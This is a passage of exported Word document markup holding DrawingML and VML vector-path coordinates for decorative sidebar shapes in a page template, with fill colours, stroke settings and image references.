                                <a:lnTo>
                                  <a:pt x="448246" y="1857552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="330746" y="1518031"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="239356" y="1174623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156667" y="823468"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="95732" y="503428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="47866" y="179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5856" y="6775450"/>
                            <a:ext cx="687705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2509520">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="47866" y="179451"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="95732" y="503428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156667" y="823468"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="239356" y="1174623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="330746" y="1518031"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="448246" y="1857552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="535279" y="2079993"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="626668" y="2294623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="674547" y="2466340"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="687603" y="2509266"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="617969" y="2372677"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="513524" y="2122919"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="413423" y="1865363"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="300278" y="1525905"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="204533" y="1178560"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="126199" y="827278"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56565" y="417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98271" y="9265196"/>
                            <a:ext cx="14414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77495">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="47879" y="140487"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="104394" y="277075"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="143637" y="277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98271" y="9265196"/>
                            <a:ext cx="14414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77495">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="143637" y="277075"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="104394" y="277075"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="47879" y="140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58445" y="6584188"/>
                            <a:ext cx="6540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70840">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="17411" y="191262"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="65277" y="370839"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="34810" y="160019"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="34810" y="1443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8445" y="6584188"/>
                            <a:ext cx="6540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70840">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="34810" y="144399"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="34810" y="160019"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="65277" y="370839"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17411" y="191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37247" y="5417439"/>
                            <a:ext cx="1750060" cy="30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0060" h="3051810">
                                <a:moveTo>
                                  <a:pt x="1749539" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1575422" y="148209"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1410068" y="304418"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1249032" y="468249"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1101077" y="636015"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="909561" y="858520"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="726808" y="1096517"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="565772" y="1338452"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="413499" y="1596008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="287261" y="1853564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="174078" y="2126742"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91389" y="2403856"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30467" y="2684780"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4356" y="2969767"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2985262"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30467" y="3051683"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30467" y="2969767"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56578" y="2688717"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="117500" y="2407793"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="195833" y="2130679"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="308978" y="1865376"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="435216" y="1603883"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="578853" y="1350264"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="744207" y="1108202"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="918324" y="866266"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1109713" y="639952"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1262113" y="472186"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1414386" y="308228"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1579740" y="152146"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1749539" y="3810"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1749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37247" y="5417439"/>
                            <a:ext cx="1750060" cy="30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0060" h="3051810">
                                <a:moveTo>
                                  <a:pt x="1749539" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1749539" y="3810"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1579740" y="152146"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1414386" y="308228"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1262113" y="472186"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1109713" y="639952"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="918324" y="866266"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="744207" y="1108202"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="578853" y="1350264"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="435216" y="1603883"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="308978" y="1865376"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="195833" y="2130679"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="117500" y="2407793"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56578" y="2688717"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30467" y="2969767"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30467" y="3051683"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2985262"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4356" y="2969767"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30467" y="2684780"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91389" y="2403856"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="174078" y="2126742"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="287261" y="1853564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="413499" y="1596008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="565772" y="1338452"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="726808" y="1096517"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="909561" y="858520"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1101077" y="636015"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1249032" y="468249"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1410068" y="304418"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1575422" y="148209"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1749539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37247" y="8500364"/>
                            <a:ext cx="16129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765175">
                                <a:moveTo>
                                  <a:pt x="141528" y="725208"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="143611" y="733615"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="161023" y="764832"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="141528" y="725208"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="161290" h="765175">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4356" y="156057"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="21767" y="316052"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="65278" y="569709"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="95745" y="632155"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="141528" y="725208"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91389" y="522884"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="52222" y="312153"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30467" y="70205"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="26111" y="584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37247" y="8500364"/>
                            <a:ext cx="16129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765175">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="26111" y="58496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30467" y="70205"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="52222" y="312153"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91389" y="522884"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="143611" y="733615"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="161023" y="764832"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="95745" y="632155"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="65278" y="569709"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="21767" y="316052"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4356" y="1560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63460" y="9284716"/>
                            <a:ext cx="13525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7810">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="104406" y="257556"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="134886" y="257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63460" y="9284716"/>
                            <a:ext cx="13525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7810">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="134886" y="257556"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="104406" y="257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37247" y="8402828"/>
                            <a:ext cx="3048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68275">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="97535"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="26111" y="156032"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30467" y="167741"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30467" y="66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37247" y="8402828"/>
                            <a:ext cx="3048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68275">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="30467" y="66293"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30467" y="167741"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="26111" y="156032"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="97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02525" y="9070073"/>
                            <a:ext cx="20066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472440">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="47878" y="171716"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="60934" y="214642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="195821" y="472198"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="200139" y="472198"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="143624" y="335610"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="95745" y="195122"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30467" y="624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802525" y="9070073"/>
                            <a:ext cx="20066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472440">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="30467" y="62445"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="95745" y="195122"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="143624" y="335610"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="200139" y="472198"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="195821" y="472198"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="60934" y="214642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="47878" y="171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458213" y="1752600"/>
                            <a:ext cx="77914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5/22/2026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8pt;margin-top:19.799999pt;width:201.4pt;height:751.8pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:15728640" id="docshapegroup1" coordorigin="490,396" coordsize="4028,15036">
                <v:rect style="position:absolute;left:489;top:396;width:358;height:15036" id="docshape2" filled="true" fillcolor="#44536a" stroked="false">
                  <v:fill type="solid"/>
                </v:rect>
                <v:shape style="position:absolute;left:489;top:2812;width:4028;height:910" id="docshape3" coordorigin="490,2813" coordsize="4028,910" path="m4063,2813l490,2813,490,3722,4063,3722,4518,3268,4063,2813xe" filled="true" fillcolor="#4471c4" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1464;top:12530;width:560;height:1811" id="docshape4" coordorigin="1465,12530" coordsize="560,1811" path="m1465,12530l1493,12748,1644,13271,1814,13789,2025,14341,2025,14246,1850,13781,1644,13156,1465,12530xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1464;top:12530;width:560;height:1811" id="docshape5" coordorigin="1465,12530" coordsize="560,1811" path="m1465,12530l1644,13156,1850,13781,2025,14246,2025,14341,1814,13789,1644,13271,1493,12748,1465,12530xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:2052;top:14316;width:533;height:1107" id="docshape6" coordorigin="2052,14316" coordsize="533,1107" path="m2052,14316l2057,14419,2190,14719,2328,15012,2548,15423,2585,15423,2360,15003,2222,14699,2089,14394,2052,14316xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:2052;top:14316;width:533;height:1107" id="docshape7" coordorigin="2052,14316" coordsize="533,1107" path="m2052,14316l2089,14394,2222,14699,2360,15003,2585,15423,2548,15423,2328,15012,2190,14719,2057,14419,2052,14316xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:804;top:7332;width:643;height:5235" id="docshape8" coordorigin="804,7333" coordsize="643,5235" path="m804,7333l804,7658,813,7987,845,8637,896,9292,965,9942,1047,10592,1157,11238,1286,11884,1437,12526,1447,12567,1424,12366,1295,11802,1185,11234,1070,10592,983,9942,910,9292,859,8637,818,7987,809,7658,804,7333xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:804;top:7332;width:643;height:5235" id="docshape9" coordorigin="804,7333" coordsize="643,5235" path="m804,7333l809,7658,818,7987,859,8637,910,9292,983,9942,1070,10592,1185,11234,1295,11802,1424,12366,1447,12567,1437,12526,1286,11884,1157,11238,1047,10592,965,9942,896,9292,845,8637,813,7987,804,7658,804,7333xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1382;top:9015;width:207;height:3515" id="docshape10" coordorigin="1382,9016" coordsize="207,3515" path="m1463,12512l1465,12530,1465,12518,1463,12512xm1589,9016l1538,9287,1497,9559,1437,10115,1396,10666,1382,11213,1387,11769,1419,12320,1424,12366,1463,12512,1447,12320,1410,11769,1396,11213,1410,10666,1447,10115,1502,9563,1543,9287,1589,9016xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1382;top:9015;width:207;height:3515" id="docshape11" coordorigin="1382,9016" coordsize="207,3515" path="m1589,9016l1543,9287,1502,9563,1447,10115,1410,10666,1396,11213,1410,11769,1447,12320,1465,12530,1465,12518,1424,12366,1419,12320,1387,11769,1382,11213,1396,10666,1437,10115,1497,9559,1538,9287,1589,9016xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1446;top:12567;width:707;height:2589" id="docshape12" coordorigin="1447,12567" coordsize="707,2589" path="m1447,12567l1502,12995,1575,13419,1662,13781,1754,14143,1873,14493,1974,14757,2089,15016,2153,15156,2144,15110,2094,14938,1997,14711,1906,14485,1791,14131,1690,13773,1603,13419,1543,13086,1493,12748,1447,12567xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1446;top:12567;width:707;height:2589" id="docshape13" coordorigin="1447,12567" coordsize="707,2589" path="m1447,12567l1493,12748,1543,13086,1603,13419,1690,13773,1791,14131,1906,14485,1997,14711,2094,14938,2144,15110,2089,15016,1974,14757,1873,14493,1754,14143,1662,13781,1575,13419,1502,12995,1447,12567xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:2188;top:15137;width:155;height:287" type="#_x0000_t75" id="docshape14" stroked="false">
                  <v:imagedata r:id="rId5" o:title=""/>
                </v:shape>
                <v:shape style="position:absolute;left:1423;top:12365;width:69;height:383" id="docshape15" coordorigin="1424,12366" coordsize="69,383" path="m1424,12366l1447,12567,1492,12748,1465,12530,1465,12518,1424,12366xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1423;top:12365;width:69;height:383" id="docshape16" coordorigin="1424,12366" coordsize="69,383" path="m1424,12366l1465,12518,1465,12530,1492,12748,1447,12567,1424,12366xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:2024;top:11164;width:1809;height:3153" id="docshape17" coordorigin="2025,11164" coordsize="1809,3153" path="m3833,11164l3649,11316,3484,11477,3319,11641,3163,11814,2961,12049,2777,12296,2608,12547,2456,12810,2323,13082,2208,13357,2121,13645,2057,13934,2029,14226,2025,14246,2052,14316,2057,14234,2089,13934,2144,13650,2231,13366,2342,13086,2475,12818,2626,12559,2796,12300,2975,12061,3168,11822,3328,11645,3489,11481,3659,11320,3833,11164xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:2024;top:11164;width:1809;height:3153" id="docshape18" coordorigin="2025,11164" coordsize="1809,3153" path="m3833,11164l3659,11320,3489,11481,3328,11645,3168,11822,2975,12061,2796,12300,2626,12559,2475,12818,2342,13086,2231,13366,2144,13650,2089,13934,2057,14234,2052,14316,2025,14246,2029,14226,2057,13934,2121,13645,2208,13357,2323,13082,2456,12810,2608,12547,2777,12296,2961,12049,3163,11814,3319,11641,3484,11477,3649,11316,3833,11164xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:2024;top:14340;width:166;height:799" id="docshape19" coordorigin="2025,14341" coordsize="166,799" path="m2025,14341l2029,14510,2048,14674,2094,14938,2121,15003,2190,15139,2176,15102,2117,14884,2075,14670,2057,14419,2052,14407,2025,14341xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:2024;top:14340;width:166;height:799" id="docshape20" coordorigin="2025,14341" coordsize="166,799" path="m2025,14341l2052,14407,2057,14419,2075,14670,2117,14884,2176,15102,2190,15139,2121,15003,2094,14938,2048,14674,2029,14510,2025,14341xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:2152;top:15154;width:145;height:271" type="#_x0000_t75" id="docshape21" stroked="false">
                  <v:imagedata r:id="rId6" o:title=""/>
                </v:shape>
                <v:shape style="position:absolute;left:2024;top:14246;width:33;height:173" id="docshape22" coordorigin="2025,14246" coordsize="33,173" path="m2025,14246l2025,14341,2052,14407,2057,14419,2052,14316,2025,14246xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:2024;top:14246;width:33;height:173" id="docshape23" coordorigin="2025,14246" coordsize="33,173" path="m2025,14246l2052,14316,2057,14419,2052,14407,2025,14341,2025,14246xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:2093;top:14937;width:207;height:486" id="docshape24" coordorigin="2094,14938" coordsize="207,486" path="m2094,14938l2144,15110,2153,15156,2296,15423,2300,15423,2245,15283,2190,15139,2121,15003,2094,14938xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:2093;top:14937;width:207;height:486" id="docshape25" coordorigin="2094,14938" coordsize="207,486" path="m2094,14938l2121,15003,2190,15139,2245,15283,2300,15423,2296,15423,2153,15156,2144,15110,2094,14938xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:793;top:11016;width:857;height:2766" id="docshape26" coordorigin="794,11017" coordsize="857,2766" path="m794,11017l842,11349,1075,12141,1335,12928,1651,13782,1651,13629,1383,12916,1075,11969,794,11017xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill opacity="13107f" type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:793;top:11016;width:857;height:2766" id="docshape27" coordorigin="794,11017" coordsize="857,2766" path="m794,11017l1075,11969,1383,12916,1651,13629,1651,13782,1335,12928,1075,12141,842,11349,794,11017xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1698;top:13733;width:809;height:1690" id="docshape28" coordorigin="1699,13733" coordsize="809,1690" path="m1699,13733l1699,13893,1904,14348,2117,14802,2446,15423,2507,15423,2171,14778,1952,14323,1753,13856,1699,13733xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill opacity="13107f" type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1698;top:13733;width:809;height:1690" id="docshape29" coordorigin="1699,13733" coordsize="809,1690" path="m1699,13733l1753,13856,1952,14323,2171,14778,2507,15423,2446,15423,2117,14802,1904,14348,1699,13893,1699,13733xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:629;top:10322;width:138;height:744" id="docshape30" coordorigin="629,10322" coordsize="138,744" path="m629,10322l629,10513,767,11066,739,10765,629,10322xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill opacity="13107f" type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:629;top:10322;width:138;height:744" id="docshape31" coordorigin="629,10322" coordsize="138,744" path="m629,10322l739,10765,767,11066,753,11011,629,10513,629,10322xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:766;top:11066;width:1083;height:3952" id="docshape32" coordorigin="767,11066" coordsize="1083,3952" path="m767,11066l856,11724,965,12369,1089,12922,1239,13469,1418,14004,1575,14409,1740,14802,1849,15018,1829,14950,1753,14680,1609,14342,1472,13991,1287,13457,1143,12916,1013,12363,917,11859,842,11349,767,11066xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill opacity="13107f" type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:766;top:11066;width:1083;height:3952" id="docshape33" coordorigin="767,11066" coordsize="1083,3952" path="m767,11066l842,11349,917,11859,1013,12363,1143,12916,1287,13457,1472,13991,1609,14342,1753,14680,1829,14950,1849,15018,1740,14802,1575,14409,1418,14004,1239,13469,1089,12922,965,12369,856,11724,767,11066xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1904;top:14986;width:227;height:437" id="docshape34" coordorigin="1904,14987" coordsize="227,437" path="m1904,14987l1980,15208,2069,15423,2130,15423,1904,14987xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill opacity="13107f" type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1904;top:14986;width:227;height:437" id="docshape35" coordorigin="1904,14987" coordsize="227,437" path="m1904,14987l2130,15423,2069,15423,1980,15208,1904,14987xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:739;top:10764;width:103;height:584" id="docshape36" coordorigin="739,10765" coordsize="103,584" path="m739,10765l767,11066,842,11349,794,11017,794,10992,739,10765xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill opacity="13107f" type="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:739;top:10764;width:103;height:584" id="docshape37" coordorigin="739,10765" coordsize="103,584" path="m739,10765l794,10992,794,11017,842,11349,767,11066,739,10765xe" filled="false" stroked="true" strokeweight=".140pt" strokecolor="#44536a">
                  <v:path arrowok="t"/>
                  <v:stroke dashstyle="solid"/>
                </v:shape>
                <v:shape style="position:absolute;left:1650;top:8927;width:2756;height:4806" id="docshape38" coordorigin="1651,8927" coordsize="2756,4806" path="m4406,8927l4132,9161,3871,9407,3618,9665,3385,9929,3083,10279,2795,10654,2542,11035,2302,11441,2103,11846,1925,12277,1795,12713,1699,13155,1657,13604,1651,13629,1699,13733,1699,13604,1740,13162,1836,12719,1959,12283,2137,11865,2336,11453,2562,11054,2823,10673,3097,10292,3398,9935,3638,9671,3878,9413,4138,9167,4406,8933,4406,8927xe" filled="true" fillcolor="#44536a" stroked="false">
                  <v:path arrowok="t"/>
                  <v:fill opacity="13107f" type="solid"/>
                </v:shape>
